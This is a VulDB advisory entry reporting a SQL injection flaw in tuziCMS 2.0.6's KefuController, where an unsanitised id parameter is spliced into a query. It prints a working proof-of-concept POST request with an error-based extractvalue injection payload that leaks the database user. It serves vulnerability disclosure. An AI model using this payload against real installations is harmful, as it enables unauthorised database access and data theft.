Submit #71239: tuziCMS 2.0.6 \App\Manage\Controller\KefuController.class.php has SQLinjectinfo

TitletuziCMS 2.0.6 \App\Manage\Controller\KefuController.class.php has SQLinject
DescriptionBecause the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system. Exploit poc is: `POST /index.php/manage/kefu/delall HTTP/1.1 Host: www.tuzi.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2 x-forwarded-for: 8.8.8.8 x-originating-ip: 8.8.8.8 x-remote-ip: 8.8.8.8 x-remote-addr: 8.8.8.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 73 id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
Source⚠️ https://github.com/yeyinshi/tuzicms/issues/13
UserEvilmu1 (ID 38763)
Submission01/12/2023 08:02 (1 Year ago)
Moderation01/12/2023 15:49 (8 hours later)
StatusAccepted
VulDB Entry218152

Do you know our Splunk app?

Download it now for free!